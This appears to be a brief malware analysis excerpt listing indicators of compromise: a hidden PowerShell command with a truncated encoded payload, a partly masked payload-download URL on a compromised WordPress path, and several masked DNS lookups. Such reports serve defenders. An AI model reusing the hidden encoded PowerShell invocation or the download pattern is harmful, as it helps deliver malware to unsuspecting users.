Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAbgBmAGkAdwBkAGoAPQAnAE0AYgBnAHEAeQBpAHkAYgBqAHYAdQBoACcAOwAkAE4AdwBxAGcAZQB5AGQAaABuACAAPQAgACcAMQAzADQAJwA7ACQARgBwAHIAcgBhAGcAeQBxAHoAeAA9ACcARAB2AHg...
- http://dl####mhomes.com/wp-admin/bwfPhHO/
- DNS ASK re#######ipaz.000webhostapp.com
- DNS ASK ra####shoreic.com
- DNS ASK my###y.style
- DNS ASK dl####mhomes.com
- DNS ASK zv######l.000webhostapp.com